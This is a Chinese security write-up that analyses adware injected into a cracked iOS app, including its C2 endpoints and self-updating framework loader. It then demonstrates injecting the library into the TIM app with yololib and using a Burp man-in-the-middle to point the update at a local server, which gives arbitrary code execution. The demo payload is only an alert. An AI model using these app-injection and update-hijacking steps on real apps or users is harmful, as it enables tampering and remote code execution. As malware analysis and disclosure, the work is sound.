Contributors : [OSG·辛] team :afox、AliceForever、KoU2N、物以类聚
一、从App中提取木马并分析木马
(1)iOS Application File
最近一款在VirusTotal的应用程序引起了我们的注意。
$ openssl dgst -sha256 com.mailtime.MailTimePro-clutch2.ipaSHA256(com.mailtime.MailTimePro-clutch2.ipa)= 332cf0a45170d6787dcbefb086f5a5f0f6e920d485e377fe37e900a01c128c8e
从文件名可以看出这是一款使用了Clutch的破解软件。对ipa文件进行解压(实际是zip文件)。
$ ditto -xk com.mailtime.MailTimePro-clutch2.ipa com.mailtime.MailTimePro-clutch2$ cd "com.mailtime.MailTimePro-clutch2/Payload/MailTime Pro.app/"$ find . -type f -exec file {} \; | grep "Mach-O"(...)./jailbreak: Mach-O universal binary with 2 architectures./jailbreak (for architecture armv7): Mach-O dynamically linked shared library arm./jailbreak (for architecture arm64): Mach-O 64-bit dynamically linked shared library./MailTime Pro: Mach-O universal binary with 2 architectures./MailTime Pro (for architecture armv7): Mach-O executable arm./MailTime Pro (for architecture arm64): Mach-O 64-bit executable
jailbreak这个库看起来很可疑
$ codesign -dvv "MailTime Pro" 2>&1 | grep AuthorityAuthority=iPhone Developer: nguyen tat hung (T99T9WYY54)Authority=Apple Worldwide Developer Relations Certification AuthorityAuthority=Apple Root CA$ codesign -dvv jailbreak 2>&1 | grep AuthorityAuthority=iPhone Developer: nguyen tat hung (T99T9WYY54)Authority=Apple Worldwide Developer Relations Certification AuthorityAuthority=Apple Root CA
nguyen tat hung 虽然是一个知名开发商,但不是MailTime Pro的开发商。
进一步,我们发现jailbreak动态注入到了二进制程序中。
$ otool -arch arm64 -L "MailTime Pro"(...)@executable_path/jailbreak (compatibility version 0.0.0, current version 0.0.0)
大多数的库,在导入表中包含了他们的安装路径和真实名称
$ otool -arch arm64 -L jailbreakjailbreak:/usr/local/lib/libguiinject.dylib (compatibility version 1.0.0, current version 1.0.0)(...)
通过assert()宏,查看项目的关联信息
$ strings -arch arm64 jailbreak | grep -i guiinject/Users/gtt/Documents/workspaceIOS/guiinject/guiinject/MBProgressHUD.m/Users/gtt/Documents/workspaceIOS/guiinject/guiinject/SSZipArchive.mguiinject
(2)Inject Library
通过符号表,快速的找到知名SDK和CocoaPods。
#### Advertisement SDKsCarrotFacebook Audience NetworkGoogle AdMobStartApp#### Cocoa PodsFileMD5HashMBProgressHUDSSZipArchive
一个越狱软件包括如此多的广告是不常见的,这里有剩余的类头文件。
-[Config getConfig]方法从程序目录加载wrap.json文件。
{"udid": "jailbreak","wait_loop": "3","is_jb": "1","package_name": "com.mailtime.MailTimePro"}
经过几次循环等待,注入的代码会联系一个不安全的远程主机,部分的服务可以工作。
比如,coreapi服务似乎不能工作。
http://wrapper.laughworld.net/coreapi/active_device.php?pk=IPANAME&is_jb=1&udid=REDACTED&signature=MD5
{"return": -2,"message": "DB operator fail!"}
http://wrapper.laughworld.net/coreapi/get_list_message.php?pk=IPANAME&is_jb=1&udid=REDACTED&libver=20160818&app_pk=IPANAME_AGAIN&app_ver=1.2.3&signature=MD5
{"return": 0,"messages": []}
当api服务启动后
http://wrapper.laughworld.net/api/com.mailtime.MailTimePro_ads.json
{"advertising_list": [{"id": 1,"act_type": "0","b": "
http://bypassfirewall.net/
","dp_type": "1","url": "http://bypassfirewall.net","hide": 1,"random_show": "5","adsnet_name": "admob","adsnet_id": "ca-app-pub-3816529472258726/8039356495"}]}最有趣的是update请求
-[API getUpdate:withSelector:]方法会请求http://wrapper.laughworld.net/api/com.mailtime.MailTimePro_update.json
{"show_ads": "YES","show_message": "YES","update_message_not": "","update_link": "http://google.com","linkfw": "http://wrapper.laughworld.net/lib/DailyUploadDownloadLib.framework.zip","namefw": "DailyUploadDownloadLib.framework","md5fw": "f6a51b479516f11ce503ae06f9ffff0f","script_zip": "http://wrapper.laughworld.net/lib/filehost.scr.zip","script_file": "filehost.scr","md5_script": "a9ef52dc75ecbcfce9447237f5154417"}
script_zip,script_file和md5_script没有被执行,script_zip的URL指向一个加密的ZIP,并且md5_script是无效的(最后一个字节错误)。
linkfw指向一个有效的Zip,一旦下载并解压, -[guiinject _loadPluginAtLocation:]将加载框架并发送一个run消息到principalClass。md5fw用于自我更新。
到目前为止,我们没有看到任何广告,他们可能隐藏在视图中。
(3)Downloaded Framework$ openssl dgst -sha256 DailyUploadDownloadLibSHA256(DailyUploadDownloadLib)= 00ca48ebeda3d93ccf1b8b405fcf4c2062424bbc99425e27f0b65c7ee238780e$ file DailyUploadDownloadLibDailyUploadDownloadLib: Mach-O universal binary with 2 architecturesDailyUploadDownloadLib (for architecture armv7): Mach-O dynamically linked shared library armDailyUploadDownloadLib (for architecture arm64): Mach-O 64-bit dynamically linked shared library
开发者的标识发生了改变。
$ codesign -dvv DailyUploadDownloadLib 2>&1 | grep AuthorityAuthority=iPhone Developer: Pham Hiep (8DYXPR6ZBP)Authority=Apple Worldwide Developer Relations Certification AuthorityAuthority=Apple Root CA
框架的header中有开发者和组织。
$ cat Headers/DailyUploadDownloadLib.h//// DailyUploadDownloadLib.h// DailyUploadDownloadLib//// Created by GTT Media Hanoi on 9/29/16.// Copyright © 2016 T&B. All rights reserved.(...)
这是有Xcode自动生成的,经itviec工作网查询, GTT Media 和 T&B 是外包公司。
一旦加载完成,框架通过lib服务请求托管在DailyUploads和FileFactory站点上的文件列表。
http://wrapper.laughworld.net/lib/DailyUploadDownloadModule.conf
{"list": ["https://dailyuploads.net/hdo3rn24n5tg","https://dailyuploads.net/udzjx12rvu0z","https://dailyuploads.net/8buwsi2hk9x7","https://dailyuploads.net/vgnqrv66hp4l","https://dailyuploads.net/mla2ofh3c0z8","https://dailyuploads.net/ud2hlgpw9dto","https://dailyuploads.net/030p4rn9ll6a","https://dailyuploads.net/rsjbhbc6zi0b","https://dailyuploads.net/wzrqhpqa7x7w","https://dailyuploads.net/dqcl45a61amy","https://dailyuploads.net/rhkbzrodo6ou","https://dailyuploads.net/cqrakbup91s4","https://dailyuploads.net/yxskttjfo4h8","https://dailyuploads.net/m6p6maeijff1","https://dailyuploads.net/f15g1prokvks"]}
http://wrapper.laughworld.net/lib/FileFactoryDownloadModule.conf
{"list": ["http://filefactory.com/file/ebdz39d8dex/myfile42.encrypt",(...)"http://filefactory.com/file/1ycfrbml51ox/myfile7.encrypt","http://filefactory.com/file/1k97tfd8ibu5/kdiff3-0.9.98-MacOSX-64Bit.dmg","http://filefactory.com/file/5difpf82yog1/Newsgroup_collection.zip","http://filefactory.com/file/6mlwn7iv1mv7/docword.enron.txt.gz","http://filefactory.com/file/52sg5aurgkrz/Tiny_Wings__Andreas_Illiger___v2.1_os43_-Nitrox.rc330_84.ipa","http://filefactory.com/file/6x9iujr8u6a5/php-5.6.14.tar.bz2","http://filefactory.com/file/q29tth3j859/iBackupBot-Setup.dmg","http://filefactory.com/file/6bcmlwfuw7wl/pokegoppsl.zip","http://filefactory.com/file/4qqx4s5l36hn/iPhoneConfigUtility.dmg","http://filefactory.com/file/5vqawo60iyb9/googlemobileadssdkios.zip","http://filefactory.com/file/560caqad3k9h/mallet-2.0.8RC3.tar.gz","http://filefactory.com/file/5ovqpwwp0w7h/609704981.ipa","http://filefactory.com/file/1lpoyv8v2y73/Multiplayer_for_Minecraft_PE__v2.0_v2.012_Univ_os80_-Locophone-ICPDA.rc333_91.ipa","http://filefactory.com/file/2abv5ufb9gav/MtProtoKit-master.zip","http://filefactory.com/file/5t8e4px5fod1/577499909.ipa","http://filefactory.com/file/4zy55s6qayrh/intel_rst_7_mb_8.1.zip","http://filefactory.com/file/12toqn6khwd3/MEAD-3.12.tar.gz"]}
框架也会使用DynDNS定期检查iOS设备的外部IP。
每当框架加载完毕或者IP变更,都会从DailyUploads和FileFactory下载一个随机文件。
dailyuploads也指向其他iOS应用,这些应用都是被nguyen tat hung签名并注入的(yara规则)。
$ yara -r iOS.GuiInject.yara DailyUploadsipa_jb DailyUploads/com.infinear.call-clutch2.ipaipa_jb DailyUploads/com.axidep.polyglotvoicereader-clutch2.ipaipa_jb DailyUploads/com.contrast.mileagelog-clutch2.ipaipa_jb DailyUploads/com.kymatica.AUFX-Space-clutch2.ipaipa_jb DailyUploads/co.qapps.calcpro-clutch2.ipaipa_jb DailyUploads/com.pixiapps.ecoutemobile-clutch2.ipaipa_jb DailyUploads/com.jhnd.blender-clutch2.ipaipa_jb DailyUploads/com.jackadam.darksky-rc.ipaipa_jb DailyUploads/com.markelsoft.Text2Speech-clutch2.ipaipa_jb DailyUploads/com.giacomoballi.FindTower-clutch2.ipaipa_jb DailyUploads/com.venderbase.dd-wrt-clutch2.ipaipa_jb DailyUploads/com.vincenzoaccardi.itracking-clutch2.ipaipa_jb DailyUploads/com.realvnc.VNCViewer-clutch2.ipaipa_jb DailyUploads/com.yacreader.yacreader-clutch2.ipaipa_jb DailyUploads/com.plumamazing.iWatermark-clutch2.ipa
(4)Abusing the Injected Adware Library
一个动态库使用不安全的协议来连接远程主机并执行代码。我们是否通过拦截和修改update的response,加载了自己的代码?能否移植到别的APP中?
二、在TIM App中注入jailbreak广告库
(1)砸壳ipa
TMde-iPhone:~ root# ./clutch -iInstalled apps:1: TIM – 轻聊的QQ,更方便办公 2: 人民日报 TMde-iPhone:~ root# ./clutch -d 1Zipping TIM.app...DONE: /private/var/mobile/Documents/Dumped/com.tencent.tim-iOS7.0-(Clutch-2.0.4).ipaFinished dumping com.tencent.tim in 73.1 secon
(2)拷贝com.tencent.tim-iOS7.0-(Clutch-2.0.4).ipa至电脑并解压
# unzip com.tencent.tim-iOS7.0-\(Clutch-2.0.4\).ipa# mv Payload TIM
(3)在TIM中注入jailbreak
# cp com.mailtime.MailTimePro-clutch2/Payload/MailTime\ Pro.app/jailbreak TIM/TIM.app/# cp com.mailtime.MailTimePro-clutch2/Payload/MailTime\ Pro.app/wrap.json TIM/TIM.app/# vi TIM/TIM.app/wrap.json (修改package_name为com.tencent.tim)# cd TIM/TIM.app/# yololib TIM jailbreak2017-06-28 19:40:36.300 yololib[1312:40852] dylib path @executable_path/jailbreak2017-06-28 19:40:36.303 yololib[1312:40852] dylib path @executable_path/jailbreakReading binary: TIM...2017-06-28 19:40:36.303 yololib[1312:40852] size 502017-06-28 19:40:36.303 yololib[1312:40852] complete!# otool -L TIM | grep jailbreak@executable_path/jailbreak (compatibility version 1.0.0, current version 1.0.0)@executable_path/jailbreak (compatibility version 1.0.0, current version 1.0.0)
(4)重新签名并打包为ipa文件,安装新程序至iOS
工具:iOS App Signner、codesign、AppResign、Cydia Impactor皆可以
(5)iOS配置局域网代理,并使用BurpSuite抓包,BurpSuite开启修改Intercept Client Resquests功能
(6)撰写新的动态链接库(文件见附件)用于劫持流程
压缩并计算md5。
# md5 DailyUploadDownloadLib.framework.zipMD5 (DailyUploadDownloadLib.framework.zip) = 08ae6354cd0c41d807cb2fbda5a52d9f
三 、使用BurpSuite中间人劫持木马,成功任意代码执行
(7)启动本地httpd,并将DailyUploadDownloadLib.framework.zip放置在根目录
# sudo httpd# sudo mv DailyUploadDownloadLib.framework.zip /Library/WebServer/Documents/lib/
(8)启动App,使用burp修改以下请求回包
GET /api/com.tencent.time_update.json HTTP/1.1Host: wrapper.laughworld.netAccept: */*User-Agent: TIM/1.1.6.416 CFNetwork/711.4.6 Darwin/14.0.0Accept-Language: zh-cnAccept-Encoding: gzip, deflateConnection: close
修改返回的response数据包
HTTP/1.1 200 OKServer: nginx/1.10.2Date: Wed, 28 Jun 2017 14:09:31 GMTContent-Type: application/jsonContent-Length: 191Last-Modified: Thu, 27 Apr 2017 02:54:25 GMTConnection: closeETag: "59015d61-bf"Accept-Ranges: bytes{"show_ads":"NO","linkfw":"http:\/\/wrapper.laughworld.net\/lib\/DailyUploadDownloadLib.framework.zip","namefw":"DailyUploadDownloadLib.framework","md5fw":"9e76e8cc5bc776ce7a2981be6418ed35"}
修改linkfw和md5fw的值
{"show_ads":"NO","linkfw":"http:\/\/10.0.0.239\/lib\/DailyUploadDownloadLib.framework.zip","namefw":"DailyUploadDownloadLib.framework","md5fw":"08ae6354cd0c41d807cb2fbda5a52d9f"}
(9)弹出alert
结果会弹出我们写在DailyUploadDownloadLib中的弹框。
UIAlertView *alert = [[UIAlertView alloc] initWithTitle:@"辛巴达6月冒险记" message:nil delegate:nil cancelButtonTitle:nil otherButtonTitles:@"done", nil];[alert show];
四、相关工具
IDA
HopperIFunBoxusbmuxdXcodedumpdecryptedCycriptcodesignyololibClass-dumpClutchiOS App SignnerBurpSuiteCharlesAppResignCydia Impactor